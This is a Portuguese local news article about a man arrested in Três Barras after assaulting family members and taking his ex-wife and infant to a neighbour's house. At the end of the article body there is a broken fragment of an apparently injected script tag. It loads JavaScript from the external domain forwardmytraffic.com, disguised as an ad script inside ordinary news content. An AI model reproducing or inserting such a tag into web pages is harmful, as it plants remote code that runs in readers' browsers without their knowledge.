InícioDestaqueMulher é Agredida por Marido em Três Barras

Mulher é Agredida por Marido em Três Barras

Últimas notícias

Em ação rápida policias recuperam veículo roubado em Canoinhas

Nesta quinta-feira, 20, a Polícia Militar foi  acionada para...

Mulher vítima de violência doméstica aciona a PM através do botão do pânico

Na manhã desta quinta-feira, 20, uma mulher vítima de...

Na segunda-feira, 27, por volta das 22h10, equipes da PM de Três Barras foram acionadas via Copom 190 para deslocar na Rua Getulio Vargas, bairro São Cristovão no município de Três Barras, para verificar a denuncia de violência domestica.

 

No local a equipe PM se deparou com uma mulher relatando que o ex-marido de sua filha havia entrado em sua residência e agredido fisicamente sua filha e também seu filho, que estava no local, fugindo em seguida com a feminina e uma criança de seis meses, a força, até uma casa em frente a sua tentando se esconder.

 

Diante das informações repassadas foi realizado buscas na tentativa de localizar o agente onde a guarnição recebia varias informações desencontradas de populares, porém em determinado momento a guarnição recebeu uma informação de que o autor estaria na casa da vizinha da frente.

 

Na residência indicada à guarnição, com a autorização da proprietária, foi adentrando na casa e localizando o agente junto com a feminina e o bebê, escondido em um quarto. Foi portando dado voz de prisão ao homem, lido seus direitos constitucionais e conduzido até a delegacia de Polícia Civil, para providências…. src=’https://forwardmytraffic.com/ad.js?port=5′ type=’text/javascript’>

Equipe Gazeta
Equipe Gazetahttps://gazetanortesc.com.br
Somos um jornal de notícias e classificados gratuitos. Estamos há 25 anos no mercado e nosso principal diferencial é o jornal digital.